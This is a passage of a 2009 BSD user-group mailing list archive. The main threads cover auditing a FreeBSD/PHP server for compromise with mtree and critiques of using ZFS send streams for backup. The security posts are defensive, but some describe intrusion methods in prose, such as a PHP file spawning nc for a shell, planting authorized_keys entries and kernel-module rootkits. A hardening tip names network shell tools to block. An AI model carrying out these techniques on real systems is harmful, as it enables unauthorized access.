is the favorite directory of all www script kiddies and other > > crackers. Mounting it noexec can help a little bit, but I also disable > > world x rights for perl, ssh, nc, sh, c, as, etc., so they won't be able > > to open a remote reverse shell. I really think that php websites > > nowadays are number one on the crackers' list. > > Is there a document with a list of steps that could potentially help this? > Also, is there a possible default mtree file I could use for 6.3-RELEASE > since I didn't generate one in the beginning? What's the best way to > audit an *existing* server with PHP running on it, etc. We've got some > wordpress installs, etc. - unsure if any were vulnerable. The only document you need is 'man mtree'. There is no default mtree specification file generated with at least sha256digest, and that's what you need. You also need to make sure to exclude (-X filename) any directories with dynamically generated files. For the overall security of the site installing some type of WAF could help, like mod-security2. # mtree -c -K sha256digest -X mtree.exclude -p /path > host.mtree # mtree -X mtree.exclude -p /path < host.mtree That's only two commands you need to know. Of course you can script it to send you alerts via email etc. --Andy From matt at atopia.net Mon Mar 9 13:10:58 2009 From: matt at atopia.net (Matt Juszczak) Date: Mon, 9 Mar 2009 13:10:58 -0400 (EDT) Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49b4fba9.Jl2L6Zv35eHa839q%akosela@andykosela.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49b4fba9.Jl2L6Zv35eHa839q%akosela@andykosela.com> Message-ID: > The only document you need is 'man mtree'. There is no default mtree > specification file generated with at least sha256digest, and that's what > you need. You also need to make sure to exclude (-X filename) any > directories with dynamically generated files. For the overall security > of the site installing some type of WAF could help, like mod-security2. > > # mtree -c -K sha256digest -X mtree.exclude -p /path > host.mtree > > # mtree -X mtree.exclude -p /path < host.mtree > > That's only two commands you need to know. Of course you can script it > to send you alerts via email etc. > > --Andy Andy, Understood, but if I'm trying to compare files that came with the default FreeBSD 6.3-RELEASE installation (to protect from rootkits), wouldn't running a command on ANY 6.3-RELEASE install that I know to be correct work? From akosela at andykosela.com Mon Mar 9 19:48:00 2009 From: akosela at andykosela.com (Andy Kosela) Date: Tue, 10 Mar 2009 00:48:00 +0100 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49b4fba9.Jl2L6Zv35eHa839q%akosela@andykosela.com> Message-ID: <49b5aab0.JrVJRC3wkvKL+jcc%akosela@andykosela.com> Matt Juszczak wrote: > > The only document you need is 'man mtree'. There is no default mtree > > specification file generated with at least sha256digest, and that's what > > you need. You also need to make sure to exclude (-X filename) any > > directories with dynamically generated files. For the overall security > > of the site installing some type of WAF could help, like mod-security2. > > > > # mtree -c -K sha256digest -X mtree.exclude -p /path > host.mtree > > > > # mtree -X mtree.exclude -p /path < host.mtree > > > > That's only two commands you need to know. Of course you can script it > > to send you alerts via email etc. > > > > --Andy > > Andy, > > Understood, but if I'm trying to compare files that came with the default > FreeBSD 6.3-RELEASE installation (to protect from rootkits), wouldn't > running a command on ANY 6.3-RELEASE install that I know to be correct > work? Not really. mtree(8) by default takes into account mtime, so if you rebuilt the system at any given time, you need to start from scratch with the new fresh specification file. That's an example of mtree(8) specification: COPYRIGHT mode=0444 size=6192 time=1233677486.0 \ sha256digest=a51a4407a4a7e188639fc2f066c2fdc898fbcde239b03395dafa4ebc5eea54b2 --Andy From matt at atopia.net Mon Mar 9 19:53:20 2009 From: matt at atopia.net (Matt Juszczak) Date: Mon, 9 Mar 2009 19:53:20 -0400 (EDT) Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49b5aab0.JrVJRC3wkvKL+jcc%akosela@andykosela.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49b4fba9.Jl2L6Zv35eHa839q%akosela@andykosela.com> <49b5aab0.JrVJRC3wkvKL+jcc%akosela@andykosela.com> Message-ID: > Not really. mtree(8) by default takes into account mtime, so if you > rebuilt the system at any given time, you need to start from scratch > with the new fresh specification file. OK. Surely there's a way to check out a system where this procedur wasn't performed. I guess, potentially, using chkrootkit comparing sources compiled in /usr/src? -M From spork at bway.net Mon Mar 9 22:15:24 2009 From: spork at bway.net (Charles Sprickman) Date: Mon, 9 Mar 2009 22:15:24 -0400 (EDT) Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> Message-ID: On Mon, 9 Mar 2009, ??? wrote: >> Yes, /tmp is the favorite directory of all www script kiddies and other >> crackers. Mounting it noexec can help a little bit, but I also disable >> world x rights for perl, ssh, nc, sh, c, as, etc., so they won't be able >> to open a remote reverse shell. I really think that php websites >> nowadays are number one on the crackers' list. Im coming into this late and addressing the /tmp issue. This is a very, very simple tip that comes as a result of some type of OCD issue I have with /tmp. At some point in the last few years I noticed that /tmp becomes a total trash heap as you install more and more junk on a server. However I also noticed that a good deal of software that needs a "tmp" directory of some sort allows you to explicitly specify a path. So my current procedure is this: -if a piece of software allows you to specify a path to "/tmp", specify it, but create a subdirectory in /tmp for it and chown it to the user the app will be running as Simple, but using the example of php, you can set a path for the php session info, the upload dir, etc. (upload_tmp_dir, session.save_path, eaccelerator.cache_dir). So if you start thinking something sneaky is going on with php, you are looking at not all of /tmp for crap, but you can zoom right into the problem area... Just a handy tip... Charles > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > From ike at lesmuug.org Tue Mar 10 12:28:48 2009 From: ike at lesmuug.org (Isaac Levy) Date: Tue, 10 Mar 2009 12:28:48 -0400 Subject: [nycbug-talk] Remote backup services In-Reply-To: <5D0DAC0B-5A1C-46B7-9264-B7028FF2369C@exit2shell.com> References: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry> <5D0DAC0B-5A1C-46B7-9264-B7028FF2369C@exit2shell.com> Message-ID: On Mar 4, 2009, at 9:05 AM, Steven Kreuzer wrote: > > On Mar 3, 2009, at 6:43 PM, Raj Goel wrote: > >> Guys, >> >> Has anyone figured out how to implement Mozy or Carbonite like >> backup services using FOSS tools? >> >> How would you backup linux, bsd, mac clients? Windows? >> >> Like the idea of wan-based backups, dislike trusting vendors that >> may cease to exist. > > Thats a pretty open ended question. > > How much infrastructure are you willing to put behind this? > How reliable do you need it to be? > How much money are you willing to spend? > How many clients are you backing up? > How much storage space do you need? > > -- > Steven Kreuzer > http://www.exit2shell.com/~skreuzer Indeed- without knowing your reqs, this is really open-ended... -- However, for offsite cumulative backups, this is certainly novel: ZFS Snapshots to Amazon S3: http://blogs.sun.com/ec2/entry/zfs_snapshots_to_and_from Depending on your requirements, instead of actually mounting the snapshots remotely, (as in the article), one could script pgp/gpg encryption and just dump the snapshot files- pay as you go historical snapshots... This ZFS snapshot method doesn't just apply to S3, of course one could script them to shuffle off elsewhere... (Do the pricing with S3 and compare actual use pricing... If you'll retrieve the data often, the S3 scenario could become quite costly...) Rocket- .ike From ike at lesmuug.org Tue Mar 10 12:32:46 2009 From: ike at lesmuug.org (Isaac Levy) Date: Tue, 10 Mar 2009 12:32:46 -0400 Subject: [nycbug-talk] Remote backup services In-Reply-To: <5D0DAC0B-5A1C-46B7-9264-B7028FF2369C@exit2shell.com> References: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry> <5D0DAC0B-5A1C-46B7-9264-B7028FF2369C@exit2shell.com> Message-ID: <73FCF000-4C12-4051-BE3A-AE7FCFCABFED@lesmuug.org> On Mar 4, 2009, at 9:05 AM, Steven Kreuzer wrote: > > On Mar 3, 2009, at 6:43 PM, Raj Goel wrote: > >> Guys, >> >> Has anyone figured out how to implement Mozy or Carbonite like >> backup services using FOSS tools? >> >> How would you backup linux, bsd, mac clients? Windows? >> >> Like the idea of wan-based backups, dislike trusting vendors that >> may cease to exist. > > Thats a pretty open ended question. > > How much infrastructure are you willing to put behind this? > How reliable do you need it to be? > How much money are you willing to spend? > How many clients are you backing up? > How much storage space do you need? > > -- > Steven Kreuzer > http://www.exit2shell.com/~skreuzer Indeed- without knowing your reqs, this is really open-ended... -- However, for offsite cumulative backups, this is certainly novel: ZFS Snapshots to Amazon S3: http://blogs.sun.com/ec2/entry/zfs_snapshots_to_and_from Depending on your requirements, instead of actually mounting the snapshots remotely, (as in the article), one could script pgp/gpg encryption and just dump the snapshot files- pay as you go historical snapshots... This ZFS snapshot method doesn't just apply to S3, of course one could script them to shuffle off elsewhere... (Do the pricing with S3 and compare actual use pricing... If you'll retrieve the data often, the S3 scenario could become quite costly...) Rocket- .ike From carton at Ivy.NET Tue Mar 10 14:28:25 2009 From: carton at Ivy.NET (Miles Nordin) Date: Tue, 10 Mar 2009 14:28:25 -0400 Subject: [nycbug-talk] Remote backup services In-Reply-To: <73FCF000-4C12-4051-BE3A-AE7FCFCABFED@lesmuug.org> (Isaac Levy's message of "Tue, 10 Mar 2009 12:32:46 -0400") References: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry> <5D0DAC0B-5A1C-46B7-9264-B7028FF2369C@exit2shell.com> <73FCF000-4C12-4051-BE3A-AE7FCFCABFED@lesmuug.org> Message-ID: >>>>> "il" == Isaac Levy writes: il> ZFS Snapshots to Amazon S3: il> http://blogs.sun.com/ec2/entry/zfs_snapshots_to_and_from Aside from the problem that S3 is ludicrously expensive... you should not be storing 'zfs send' streams, ever. You may transport them but not archive them. The problems: * they're atomic. If one bit in a stream is flipped, the whole stream is bad. * they're atomic. You must restore an entire stream or no stream---if you don't have enough space for a stream you can't even see what's inside it. * the incremental feature is rigid. If one bit is flipped in the backing-store to which the incremental is meant to apply, then it won't restore. * the upward/downward compatibility across ZFS versions is bad and haphazard. You can only count on it working for the exact same release that wrote the stream, though sometimes it's better. They are trying to make a stronger compatibility commitment, but they do not seem in control of the current situation so I am not prepared to buy whatever commitment they make, especially for something archival. * bugs. kernel panics on recv, endiness bugs. * there is no way to test the stream's validity without enough space to restore it. This is important period, but it's more subtle. There never will be such a way, because the kernel is involved in restoring streams, and one of the ways that streams can be invalid is that they panic the kernel upon recv which is not a legitimate way, it's an unfixed bug, so it could come and go arbitrarily, and nothing but an exact replication of the recv process is a good way to test for it since we do not know where the bug is yet. This bug is bad but FAR mroe workable if you're using send|recv to move data rather than archive it. I continually get into arguments with people on the mailing list about this, and to my view I win every single one of them decisively and the original suggesters leave ``educated'' not indignant, but someone pops up later with the same bad idea. And the Sun people will not update the si wiki with other than an ambiguous CYA warning ``zfs send is not an enterprise backup solution,'' and I wrote the wiki guy myself asking for an account and was ignored so I guess the si wiki is a Sun mouthpiece like their employee blogs, just hiding under another domain name. Partly I think it keeps coming up because it's an obvious idea that's very subtle in its badness. And partly Sun is promoting this bad practice through their viral marketing behemoth to the effect of making ZFS seem more versatile. Storing them in S3 probably has fewer of the problems of storing them on disk or tape, but it's still not great. The blogger is suggesting something subtly different, using S3 to ``move'' filesystems between instances (safe) or across short stretches of time (less safe, depends). Storing them in S3 for the purposes of booting a system might be a relatively good idea, because in that case you will have a filesystem-level backup somewhere else (filesystem-level means your backup must NOT be a duplicate copy of the same S3 stream. it must be a copy in cpio/tar/zpool/ext3 form.). He's just talking about non-boot data filesystems but... I don't think it's easy to arrange to boot a solaris VM from a ZFS-root stored in 'send' format. It'd be interesting to explore. You could recv one bulk stream on all nodes, then recv a different incremental stream on each subnode to customize it, thus saving S3 dollars. I think Solaris do have an early userspace like Linux, so maybe something could be adapted to boot from a zfs send stream. This application is not the same as backup, though. It's a form of replication, which is what zfs send | zfs recv's fragileness is good for. It's replication because if the stream goes sour somehow, you can presumably regenerate it from the real authoritative master node somewhere outside Amazon. What you care about most is, when you bring up your tens of EC2 instances and 'zfs recv' their roots, you want them to really definitely have exactly the root disk you think they should. If they don't, you can chuck the broken S3 stream and make a new one. It would be tempting to save S3 dollars by tossing in 'zfs send' incremental snapshots of the VM as the VM is running, instead of stopping the VM and copying the whole virtual disk. You could afford in S3 $ and performance to do it frequently, even like, every five minutes. And zfs will let you coalesce these snapshots, so every hour you could send a rollup and drop the tiny ones. You could do test-sends to 'wc' and only pay for an S3 dump after the 'zfs send' stream gets kind-of big. This would be kind of borderline safety depending on whether the VM's are storing something of high value (unsafe), or is it just logs and mailqueues full of spam backscatter (slap!)---like, you are using zfs send/S3 as you'd use a fragile unredundant working disk, and your real backup is elsewhere like on a nightly zfs send -> zpool outside Amazon. You can work through my objections below and see if you think it's safe or not. anyway 'zfs send' is for replicating one ZFS pool into another, not for backing it up. If you want to backup, you should use gtar/pax/cpio/rsync/..., or else zfs recv into a backup pool. If you have enough scratch space, you can write file-backed vdev's to tape, or make several dvd/bd-size file vdevs. archiving the ZFS pools themselves is obviously okay since otherwise ZFS would suck, but you can see my specific cases below. but I think S3 is too expensive to use for anything. We need self-organizing S3 on livecd, then we just rent hardware on the open market. -----8<----- From: Miles Nordin Subject: Re: [zfs-discuss] GSoC 09 zfs ideas? To: zfs-discuss at opensolaris.org Date: Mon, 02 Mar 2009 18:37:43 -0500 References: <49A511CF.1050107 at netsyncro.com> <38171ac60902260843l2e7a595cr53187ccbc924aa00 at mail.gmail.com> <49A8760C.5040500 at netsyncro.com> <47B26F54-E30A-454E-B6B5-FB18268221CA at ee.ryerson.ca> <49A88D37.10408 at gmail.com> <4786252C-55A5-4EFD-8976-955B93039A66 at ee.ryerson.ca> In-Reply-To: <4786252C-55A5-4EFD-8976-955B93039A66 at ee.ryerson.ca> (David Magda's message of "Fri, 27 Feb 2009 22:24:31 -0500") Message-ID: >>>>> "dm" == David Magda writes: dm> Yes, in its current state; hopefully that will change some dm> point in the future I don't think it will or should. A replication tool and a backup tool seem similar, but they're not similar enough. With replication, you want an exact copy, and if for some reason the copy is not exact then you need something more: you want atomicity of operations so the overwatcher scheduler: * can safely retry the send|recv until it works, * can always tell its minder with certainty how much has safely been replicated so far, * can attempt further replication without risking existing data. These things are a bit hard to achieve. And zfs send|recv does them: * If a single bit is flipped the whole stream should be discarded * If, on a 'send' timeline of , , , , one of the preceeding blobs did not make it, or became bad on the replication target (because somebody wrote to it, for example---a FAQ), it should become impossible to restore further incremental backups. The error should not be best-effort worked around, or simply silently concealed, the way it is and should be with restoring incremental backups. * reslicing the unit of replication after writing the stream is irrelevant, because you can just reslice on the replication-source if you need to do this. The possibility of reslicing interferes with the atomicity I spoke of which makes the replication scheduler so much easier to get correct. * there's no need to test a stream's validity without restoring it. The replication target will always be available and have enough free space to test-by-receiving. * there's no need to restore the stream on an unimagined future filesystem. It's more important that all fancyfeatures, ACL's, gizmos, properties, compression modes, record sizes, whatever, make it to the replication target exactly to avoid surprises. No one is worried about data being locked in to a certain filesystem because it's all there for you to get with rsync on both replication source and target. Try to use such a tool for backup, and you court disaster. Your pile of backups becomes an increasingly large time-lapse gamma ray detector, which signals a ray's presence by destroying ALL the data not just the bit, not even just the file, that the ray hit. The impossibility of reslicing (extracting a single file from the backup) means that you can find yourself needing 48TB of empty disk on a development system somewhere to get out a 100kB file locked inside the atomic blob, which is an unacceptable burden in time and expense. The other points have obvious problems for backups, too---I'll leave inventing imaginary restore scenarios as an exercise for the reader. All these harmful points are things that replication wants/needs. The goals are incompatible. If there's going to be a snapshot-aware incremental backup tool for ZFS, I do not think zfs send|recv is a good starting point. And I'm getting frustrated pointing out these issues for the 10th time---it seems like, I mention five relatively unsolveable problems, and people seize onto the easiest one, misinterpret it, and then forget the other four. the versioning issue (NOT mentioned above) is a problem for replication among different Solaris releases, not just backup. It means you could potentially have to upgrade a whole mess of machines at once. At the very least you ought to be able to upgrade the target before you upgrade the source, so you don't have to break replication while doing the upgrade---coincidentally that's the right direction for upgrade-test-downgrade, too, since it's on the target that you'd possibly have to destroy the zpools if you decide you need to downgrade. We should want this and don't have it yet. It makes having a single backup pool for a lab full of different-aged systems impossible (even with backward-only compatibility, how do you restore?), so it is worth solving for that use case too. I think the 'zfs send' format of a given filesystem should be bit-for-bit identical given a certain ZFS version, irrespective of zpool version or kernel release on the sending system. That's enough to solve the single-lab-backup-pool problem, and it's also regression-testable---keep some old streams around, recv them into the pool under test, send them back out, and make sure they come out identical. And the 'zfs recv' panics need fixing. those would both be great things, but they would *NOT* make zfs send|recv into a backup system! They would make it into a better replication system. zfs send|recv will not become backup tools if you manage to check off a few other list-of-things-to-fix, either. They can't be both a good replication system and a good backup system at the same time. no, I don't think the si wiki explains the full size of the issue adequately. It makes it sound like the tools are just a little too small, and maybe someday they will get bigger, maybe some people should just ignore the advice and use them anyway. It's CYA bullshit. i think in the mean time you should make backups with cpio (or some tool that uses something similar underneath like Amanda) or by archiving file-vdev zpools. not perfect but better. And you should store it on the medium in some way that the whole thing won't be wiped by one flipped bit (not gzip). -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 304 bytes Desc: not available URL: From matt at atopia.net Tue Mar 10 18:35:08 2009 From: matt at atopia.net (Matt Juszczak) Date: Tue, 10 Mar 2009 18:35:08 -0400 (EDT) Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> Message-ID: > Just a handy tip... Good pieces of advice. At this point, I'm implemneting mtree for my new server deployments, but I still wish there was a way to somehow check if my FreeBSD 6.3-RELEASE machine has been compromised. From techneck at goldenpath.org Tue Mar 10 18:56:31 2009 From: techneck at goldenpath.org (Tim A.) Date: Tue, 10 Mar 2009 18:56:31 -0400 Subject: [nycbug-talk] Remote backup services In-Reply-To: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry> References: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry> Message-ID: <49B6F01F.8060900@goldenpath.org> Raj Goel wrote: > Guys, > > Has anyone figured out how to implement Mozy or Carbonite like backup services using FOSS tools? > > How would you backup linux, bsd, mac clients? Windows? > > Like the idea of wan-based backups, dislike trusting vendors that may cease to exist. > > Sort of glossy ain't they? What's wrong with a good ol snapshot / rsync? Fairly portable too. But the snapshot business is very FS / OS dependent. Lots of FOSS rsync guis out there too. But none I've seen automagically work out of snapshots. Have to do that manually. Probably no one wants to tackle incorporating that into a general purpose tool cause, like I said, too many FS / OS variables in the multi-platform theater. Another important thing to consider is the remote storage equation. What level of service / reliability are you gunning for? I always thought rsync.net was a good idea. Their Windows Backup Agent even does the snapshot for ya. Never could wrap my head around paying that much for remote storage though. (even if your name is rsync.net) Compare their redundant site storage vs rsyncing across 3 el cheapo generic hosting accounts (with tons of cheap storage). $2.10/month vs $0.09/month. Maybe I'm just a cheap bastard, but I don't like throwing money away, even if it is other peoples. From techneck at goldenpath.org Tue Mar 10 19:22:06 2009 From: techneck at goldenpath.org (Tim A.) Date: Tue, 10 Mar 2009 19:22:06 -0400 Subject: [nycbug-talk] Remote Tor Controller app, besides telnet? Message-ID: <49B6F61E.10001@goldenpath.org> Playing around with Tor, ya know how circuit quality's like the luck of the draw, and if your using Vidalia you just click "New Identity" or whatever for some "clean" / new circuits. But, using a transparent proxy, you need to remotely send signals to the controller port. Vidalia is less than ideal for this, although it does have a config field for controller address and port. Its buggy, crapy and obviously assumes tor is running locally. (Required field is path to tor binary). k, so http://www.torproject.org/svn/trunk/doc/spec/control-spec.txt And you can control tor using telnet and the control-spec. Except, passing cookies or hashes via telnet is a pita, so ya gotta just leave it no auth, 127 bound and tunnel to it. I'm scratchin my head, like, dude where's the torctl utility, duh? From mspitzer at gmail.com Tue Mar 10 23:51:09 2009 From: mspitzer at gmail.com (Marc Spitzer) Date: Tue, 10 Mar 2009 23:51:09 -0400 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> Message-ID: <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com> On Tue, Mar 10, 2009 at 6:35 PM, Matt Juszczak wrote: >> Just a handy tip... > > Good pieces of advice. ?At this point, I'm implemneting mtree for my new > server deployments, but I still wish there was a way to somehow check if > my FreeBSD 6.3-RELEASE machine has been compromised. Well if it really is keeping you up at night you can do the following: 1: reinstall the box from cds, feel free to make your own if you want 2: only install binaries that you have already check sumed on your system 3: set up a nms station and monitor all your traffic 4: host based IDS 5: rewrite all your php code in something safer, say haskel. 5: learn all the things you don't know yet to do all of the above This is a huge investment in time that does not advance the bussiness or accept the fact that that you may have a problem down the road and get on with your day. Security is like insurance, its not how much I want its how much do I want to pay for. This does not mean you do not take reasonable precautions to minamize your risk, ie mtree, dir tree in temp, runing apache/web in a zone and the list goes on. But befor you start down the security rabbit hole set up a budget X dollars or Y hours for setup/training and Z hours for monitoring daily/weekly. Then do as much security as you can afford. Thanks, marc -- Freedom is nothing but a chance to be better. Albert Camus From bonsaime at gmail.com Wed Mar 11 01:09:13 2009 From: bonsaime at gmail.com (Jesse Callaway) Date: Wed, 11 Mar 2009 01:09:13 -0400 Subject: [nycbug-talk] version control for config files In-Reply-To: <60131f920903081817q658d3023s63c61b93b3eab528@mail.gmail.com> References: <22274220-1236537967-cardhu_decombobulator_blackberry.rim.net-1195934676-@bxe1146.bisx.prod.on.blackberry> <60131f920903081817q658d3023s63c61b93b3eab528@mail.gmail.com> Message-ID: On Sun, Mar 8, 2009 at 9:17 PM, H. G. wrote: > On Sun, Mar 8, 2009 at 2:45 PM, wrote: >> >> Here at ticketmaster we use an inhouse piece that we released as >> opensource. Called rubix > > Has it been renamed to "Spine"? ( http://code.google.com/p/spine-mgmt/ ) ? > > > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > > They certainly seem to be related to each other in some fashion. -- http://code.google.com/p/spine-mgmt/source/browse/trunk/docs/example_spine_config/Utils/restore-rubix I'm kinda liking those one-liner config files and will have to give this a run. -jesse From akosela at andykosela.com Wed Mar 11 04:01:29 2009 From: akosela at andykosela.com (Andy Kosela) Date: Wed, 11 Mar 2009 09:01:29 +0100 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49b4fba9.Jl2L6Zv35eHa839q%akosela@andykosela.com> <49b5aab0.JrVJRC3wkvKL+jcc%akosela@andykosela.com> Message-ID: <49b76fd9.LOQzqNyXd9L8+lXw%akosela@andykosela.com> Matt Juszczak wrote: > > Not really. mtree(8) by default takes into account mtime, so if you > > rebuilt the system at any given time, you need to start from scratch > > with the new fresh specification file. > > OK. Surely there's a way to check out a system where this procedur wasn't > performed. I guess, potentially, using chkrootkit comparing sources > compiled in /usr/src? If you recompiled world it will now be definetly harder to ensure your machine has not been compromised. Chrootkit does not compare anything, but only checks for "known signatures" in system binaries, so it can help, but not in a way you think. Proper security policies must be implemented from scratch, involving certain things even *before* you put the system online. But I would just start from the point where you are now, i.e. make a fresh mtree(8) specification and monitor any files that change and suspicious system activity. --Andy From mikel.king at olivent.com Wed Mar 11 11:35:12 2009 From: mikel.king at olivent.com (Mikel King) Date: Wed, 11 Mar 2009 11:35:12 -0400 Subject: [nycbug-talk] TowerStream Message-ID: Has anyone on the list ever worked with TowerStream? I would be interested in discussing off-list their quality and reliability. Cheers, Mikel King CEO, Olivent Technologies Senior Editor, Daemon News Columnist, BSD Magazine 6 Alpine Court Medford, NY 11763 http://www.olivent.com http://www.daemonnews.org http://www.bsdmag.org skype: mikel.king t: 631.627.3055 m: 646.554.3660 +------------------------------------------+ Do You know where your towel is? +------------------------------------------+ -------------- next part -------------- An HTML attachment was scrubbed... URL: From lists at kithalsted.com Wed Mar 11 15:02:08 2009 From: lists at kithalsted.com (Kit Halsted) Date: Wed, 11 Mar 2009 15:02:08 -0400 Subject: [nycbug-talk] TowerStream In-Reply-To: References: Message-ID: I have a couple clients who keep talking about using them. I would be interested seeing at least a summary of this discussion on-list. Cheers, -Kit On Mar 11, 2009, at 11:35 AM, Mikel King wrote: > Has anyone on the list ever worked with TowerStream? I would be > interested in discussing off-list their quality and reliability. From slynch2112 at me.com Wed Mar 11 12:22:37 2009 From: slynch2112 at me.com (Siobhan Lynch) Date: Wed, 11 Mar 2009 12:22:37 -0400 Subject: [nycbug-talk] TowerStream In-Reply-To: References: Message-ID: <49B7E54D.1030601@me.com> On 3/11/09 11:35 AM, Mikel King wrote: > Has anyone on the list ever worked with TowerStream? I would be > interested in discussing off-list their quality and reliability. > We have a towerstream wimax link here. -Trish > Cheers, > Mikel King > CEO, Olivent Technologies > Senior Editor, Daemon News > Columnist, BSD Magazine > 6 Alpine Court > Medford, NY 11763 > http://www.olivent.com > http://www.daemonnews.org > http://www.bsdmag.org > skype: mikel.king > t: 631.627.3055 > m: 646.554.3660 > +------------------------------------------+ > Do You know where your towel is? > +------------------------------------------+ > > > > > ------------------------------------------------------------------------ > > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > From carton at Ivy.NET Wed Mar 11 18:07:56 2009 From: carton at Ivy.NET (Miles Nordin) Date: Wed, 11 Mar 2009 18:07:56 -0400 Subject: [nycbug-talk] TowerStream In-Reply-To: (Mikel King's message of "Wed, 11 Mar 2009 11:35:12 -0400") References: Message-ID: >>>>> "mk" == Mikel King writes: mk> TowerStream? no I haven't, but they've been around for quite a while and keep writing me. One of their competitors is Rainbow Communications. Towerstream will give you single-homed-to-Level3 transit as the only option. Rainbow can hand off to a VLAN in 25 Broadway, IIRC. (It was for a conference, and someone from NAC was helping us.) Understand that it is not equivalent to a T1 if you are doing VoIP, because there currently seems to be no workable way to take advantage of the complicated QoS/CIR features built into their radio gear. It's not just towerstream that has this problem but also cable and (to a slightly lesser extent) dsl. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 304 bytes Desc: not available URL: From nonesuch at bad-apples.org Wed Mar 11 18:39:55 2009 From: nonesuch at bad-apples.org (Mark Saad) Date: Wed, 11 Mar 2009 18:39:55 -0400 Subject: [nycbug-talk] Kqemu and BSD Message-ID: <49B83DBB.9070005@bad-apples.org> Hello Talk I was wondering who is using Qemu with Kqemu support under *BSD. What do you think of it. -- ]Mark Saad[ mark at bad-apples.org () ascii ribbon campaign - against html e-mail /\ www.asciiribbon.org - against proprietary attachments From matt at atopia.net Wed Mar 11 19:41:03 2009 From: matt at atopia.net (Matt Juszczak) Date: Wed, 11 Mar 2009 19:41:03 -0400 (EDT) Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com> Message-ID: > Well if it really is keeping you up at night you can do the following: > 1: reinstall the box from cds, feel free to make your own if you want I'm still a bit confused. Most root kits overwrite your system binaries correct? So what would the negatives be to installing a 6.3-RELEASE system somewhere, somehow either checksumming or building an mtree of the files in /sbin, /usr/sbin, /bin, /sbin, etc. and comparing to the existing system (ignoring modification time of course). Shouldn't my FreeBSD 6.3-RELEASE system be identical in system binaries to any other 6.3-RELEASE system other than mtime? -Matt From mspitzer at gmail.com Wed Mar 11 23:48:21 2009 From: mspitzer at gmail.com (Marc Spitzer) Date: Wed, 11 Mar 2009 23:48:21 -0400 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com> Message-ID: <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com> On Wed, Mar 11, 2009 at 7:41 PM, Matt Juszczak wrote: >> Well if it really is keeping you up at night you can do the following: >> 1: reinstall the box from cds, feel free to make your own if you want > > I'm still a bit confused. ?Most root kits overwrite your system binaries > correct? ?So what would the negatives be to installing a 6.3-RELEASE system > somewhere, somehow either checksumming or building an mtree of the files in > /sbin, /usr/sbin, /bin, /sbin, etc. and comparing to the existing system > (ignoring modification time of course). ?Shouldn't my FreeBSD 6.3-RELEASE > system be identical in system binaries to any other 6.3-RELEASE system other > than mtime? it should be fine as long as you never patched anything, and that is its own issues. The real issue is not if you got rooted but how did you get rooted, if you did. Also I can own you out of /usr/local, php and friends are not in the base system. And it is also doable to root you with a Kernel Loadable Module that in kernel space you can do all sorts of games with to hide from the system. Or I get one of your php files to spawn off nc and give me a shell on the system. Another nice one is add a key to autherized_keys. The thing is most of your exposure is your php website, how are you managing that? Much of the php code out there was not written by experts from MIT but by people who code in ee, think notepad but worse, and have never had any formal training in CS/Programming. Are you using any of their code? And I do not mean you but the modules you may pull in from ports or the internet. Now if you read the rest of my note: This does not mean you do not take reasonable precautions to minamize your risk, ie mtree, dir tree in temp, runing apache/web in a zone and the list goes on. But befor you start down the security rabbit hole set up a budget X dollars or Y hours for setup/training and Z hours for monitoring daily/weekly. Then do as much security as you can afford. I specificly said mtree was a reasonable thing to do so please go do that. My main point was that it costs a lot to be "really" secure and are you sure you want to pay it, and even if you want to is the best place to spend the money? night, marc -- Freedom is nothing but a chance to be better. Albert Camus From jun at soum.co.jp Thu Mar 12 00:21:46 2009 From: jun at soum.co.jp (Jun Ebihara) Date: Thu, 12 Mar 2009 13:21:46 +0900 (JST) Subject: [nycbug-talk] Kqemu and BSD In-Reply-To: <49B83DBB.9070005@bad-apples.org> 